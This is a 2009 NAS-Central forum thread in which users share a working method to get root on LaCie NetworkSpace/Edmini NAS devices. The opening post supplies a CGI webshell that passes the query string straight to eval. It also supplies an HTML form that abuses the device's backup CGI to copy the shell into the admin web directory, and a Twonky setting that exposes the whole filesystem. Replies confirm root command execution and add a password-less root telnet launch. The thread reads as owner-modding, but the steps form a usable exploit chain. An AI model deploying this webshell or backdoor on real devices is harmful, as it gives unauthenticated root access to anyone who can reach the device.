General NAS-Central Forums

Welcome to the NAS community
It is currently Fri Jun 23, 2017 3:39 pm

All times are UTC




Post new topic Reply to topic  [ 31 posts ]  Go to page 1, 2, 3  Next
Author Message
PostPosted: Tue May 19, 2009 1:02 am 
Offline

Joined: Sun Apr 19, 2009 9:44 pm
Posts: 16
Hi,

i found a way to add webshell without dissassembling.

it suppose you have acces to admin of twonkymedia

http://lacie.nas-central.org/wiki/NetworkSpace:_MultimediaServers

First you have to create a file Webshell and copy it to a folder on an usb key

Code:
#!/bin/sh
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING


Plug the usb key on the NAS.

i can't upload file so copy this code on a html page :
Code:
<html>
<head>
   <title>Backup</title>
   <script language='Javascript'>
   function submitForm()
   {
      document.edit_form.action = 'http://' + document.getElementById('ipnas').value + '/cgi-bin/admin/backup';
      document.edit_form.submit();
   }
   </script>
</head>
<body>

<form name='edit_form' method='post' >

Nas Ip adress or Name
</br>
<input tyte='text' name='ipnas' id='ipnas' value='NetworkSpace' size='60'>
</br>

Source (Path to folder and not file on usbkey)
(Not / at the end)
</br>
<input tyte='text'  name='select2' id='select2'  value='/home/usbdisksdb1/webshell' size='60'>
</br>

Destination (Normally, don't modify)
(Not / at the end)
</br>
<input tyte='text' name='select1' id='select1' value='/www/cgi-bin/admin' size='60'>
</br>

<input type='hidden' id='update' name='update' value='true'>

</br>
<a href='javascript:submitForm();'>Copy</a>

</form>

</body>
</html>



open it, complete with correct value and click copy

it will display an error, but copy the file but it create a directory with a timestamp.

so to know the name of the directory.

http://your ip:9000/rpc/set_option?contentbase=/

no go to a config page of twonky media(http://your ip:9000/config), and look for a directory, you have now acces to all directory.
go to "/www/cgi-bin/admin/"
there is there the directory with the time-stamp.

copy it and paste to :
http://your ip/cgi-bin/admin/your directory/webshell?

webshell is now working.

after you can follow the procedure here :

http://jebimony.com/blog/content/add-ssh-lacie-edmini-v2


Last edited by belese on Thu May 21, 2009 5:01 pm, edited 3 times in total.

Top
 Profile  
 
PostPosted: Tue May 19, 2009 6:51 pm 
Offline

Joined: Thu Feb 05, 2009 8:46 pm
Posts: 98
Wow...

That's great! :D


Top
 Profile  
 
PostPosted: Tue May 19, 2009 7:35 pm 
Offline

Joined: Thu Feb 05, 2009 8:46 pm
Posts: 98
Hmmm. I'm trying to apply your hack, but I have a hard time modifying backup.html. You have single quotation marks (') where I have double ("), and in your third line they do not match. Your last line I cannot find at all.

Do you mind posting your entire modified backup.html?


Top
 Profile  
 
PostPosted: Tue May 19, 2009 11:18 pm 
Offline

Joined: Sun Apr 19, 2009 9:44 pm
Posts: 16
I clean the code and put in in my first post, so i remove this post


Top
 Profile  
 
PostPosted: Mon May 25, 2009 9:18 pm 
Offline

Joined: Thu Feb 05, 2009 8:46 pm
Posts: 98
Thank you for the nice html file. :) I have tried it and it works.
I already had access because I have opened the NAS before, but now a I have an additional webshell.

It is actually surprisingly simple if I understand it correctly. From a desktop pc, your html file issues commands available on the NAS coded in scripts in /www/cgi-bin/admin and in /usr/bin/edmini.sh to copy files from an usb disk or stick to any location on the NAS. These commands are meant to make backups, but they let you copy any file, anywhere, with executable rights, and we use it to put the webshell backdoor in place. You don't need Twonky to do that. You can exploit Twonky to find out the exact name of the directory, which is difficult to guess because it is the name of the original directory with a many digit time stamp added. Therefore we set the top directory of Twonky to the root directory of the NAS (/) with your nifty command

Code:
http://networkspace:9000/rpc/set_option?contentbase=/


Then we can use Twonky's web config page to get a directory listing of /www/cgi-bin/admin and see the name of the "backed up" directory. In my case, I could access the webshell by 'going to'

Code:
http://networkspace/cgi-bin/admin/webshell-2009052522051243283626/webshell?whoami


in a web browser. The answer I got to the whoami was

"root"

:-)

Anyone else got it working?


Top
 Profile  
 
PostPosted: Tue May 26, 2009 10:20 pm 
Offline

Joined: Sun Apr 19, 2009 9:44 pm
Posts: 16
hi

thanks to translate my explanation in "real" english!!! 8-)
i'm sorry for my english, but i'm a french native speaker.


Top
 Profile  
 
PostPosted: Tue May 26, 2009 10:42 pm 
Offline

Joined: Thu Feb 05, 2009 8:46 pm
Posts: 98
belese wrote:
thanks to translate my explanation in "real" english!!! 8-)


Thank you for the hack! Let's include it in the wiki. But first some more people that have used it successfully. For instance: does the original webshell file that is "backed up" need to have permissions set to executable? Does it need to come from a ext3-like file system?


Top
 Profile  
 
PostPosted: Tue May 26, 2009 10:45 pm 
Offline

Joined: Sun Apr 19, 2009 9:44 pm
Posts: 16
i think when it copy, it keep the same right, but i have not test it really.
i think too that you don't need to have a usb key, and can copy directly from /home/openshare, but also, i don't test it.
and for ext3, no, i've done everything from windows with an usb key in ntfs(but be sur your webshell is in UNIX format!!) i've lost more than 2 hours because my webshell was in Windows text mode.


Top
 Profile  
 
PostPosted: Wed May 27, 2009 9:47 am 
Offline

Joined: Sun Mar 08, 2009 10:19 pm
Posts: 27
Hi,

Great find (Why didn't i come up with it myself :D )

I confirm it works and you don't need the usb-stick. Just copy the file (using samba/windows share) to your openshare (create a new folder, as all in this folder will be copied to the admin page. And you just want the backdoor there.

For instance: create a folder 'hack' and name the injection script 'backdoor' (the small script, not the html).

How open your HTML-page and edit the source path to '/home/openshare/hack' and that should be it
You get an error that there is no USB device connected (so what :) ) and you need to find the timestamped folder. (use twonky)

To make the hack complete:
Copy the telnet deamon (utelnetd) to your openshare and call the following page:
http://networkspace/cgi-bin/admin/hack-<yourtimestamp>/backdoor?/home/openshare/utelnetd -l /bin/bash

This will start telnet without password check. Password check is not (yet) possible as root has no password assigned. You will be authenticated as root.

You're done :)

Kind regards,
Theike


Top
 Profile  
 
 Post subject: GREAT!
PostPosted: Sun Jun 07, 2009 10:00 am 
Offline

Joined: Tue Mar 18, 2008 2:35 pm
Posts: 6
Congratulations, this is really neat. THANK YOU!

I was less patient with my first edmini V2 more than 2 years ago and grabbed the screwdriver :twisted: very quickly. Yet, I was always hoping someone would come up with an idea!

I wonder if the hack can be applied to the 2big as well. Here, the RAID1 is kind of an obstacle when trying to access and modify the HD content with another computer. If that worked here (assuming similar applications and shell scripts on the 2big) as well the 2big might be modified while running in RAID 1. And that would mean: No problem with synchronizing two drives and no messing around with mounting them as RAID 1. As soon as I get hold of a 2big I will try it.


Top
 Profile  
 
PostPosted: Fri Jun 26, 2009 11:18 am 
Offline

Joined: Wed Jun 24, 2009 3:18 am
Posts: 3
Hi

Well, I am either doing something wrong, or lacie have changed some of their scripts. (This is a bit moot, as i have already gained access to the box using earlier techniques, but some folks may strike the same problem)

Also, my device is very new, but i am not sure how to check firmware versions etc.

Anyways...

I have created the directories and scripts as directed above, but when i load the webpage and press the button, the following error message appears briefly before the backup webpage then loads.

"df: /www/cgi-bin/admin: can't find mount point. /www/cgi-bin/admin/backup: line 131: [: -lt: unary operator expected"

some lines of the the backup script i.e. /www/cgi-bin/admin/backup are shown below, line 131 is in red.
I think the real culprit is line 121, in blue - as it appears to be checking that /home is in the destination path. If /home is not in the destination path, the script bombs out and prevents this hack working !?

Is anyone else getting the same problem ?


Quote:
SRC_SIZE=`du -s $BACKUP_SRC | awk '{print $1}'`
DEST_SIZE=`df $BACKUP_DEST | grep /home | awk '{print $4}'`

if [ $ERR_CODE -eq 0 ] && [ -z "$BACKUP_DEST" ] || [ -z "$BACKUP_SRC" ]
then
# ---
# --- Something missing
# ---
ERR_CODE=2
fi

if [ $ERR_CODE -eq 0 ] && [ ${DEST_SIZE} -lt ${SRC_SIZE} ]
then
# ---
# --- no enough space in destination
# ---
ERR_CODE=3
fi

if [ $ERR_CODE -eq 0 ]



Top
 Profile  
 
PostPosted: Fri Jun 26, 2009 5:47 pm 
Offline

Joined: Thu Feb 05, 2009 8:46 pm
Posts: 98
You can see the firmware version by surfing to the Configuration web page and the click "Support".

Mine is version 1.1.6.


Top
 Profile  
 
PostPosted: Mon Jun 29, 2009 11:20 am 
Offline

Joined: Wed Jun 24, 2009 3:18 am
Posts: 3
and mine with a possibly new set of (not so hackable) backup scripts, is version 1.1.8

Has anyone else with version 1.1.8 had any success in using the approach as defined in this thread ?

Ack.


Top
 Profile  
 
PostPosted: Tue Jun 30, 2009 7:51 pm 
Offline

Joined: Sun Mar 08, 2009 10:19 pm
Posts: 27
Any chance of providing us with a copy of the .8-scripts?

Kind regards,
Theike


Top
 Profile  
 
PostPosted: Tue Jun 30, 2009 11:20 pm 
Offline

Joined: Sun Apr 19, 2009 9:44 pm
Posts: 16
hi,

i've got the same error, but it copy file anyway (for me, but i've also 1.1.6).


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 31 posts ]  Go to page 1, 2, 3  Next

All times are UTC


Who is online

Users browsing this forum: No registered users and 5 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB® Forum Software © phpBB Group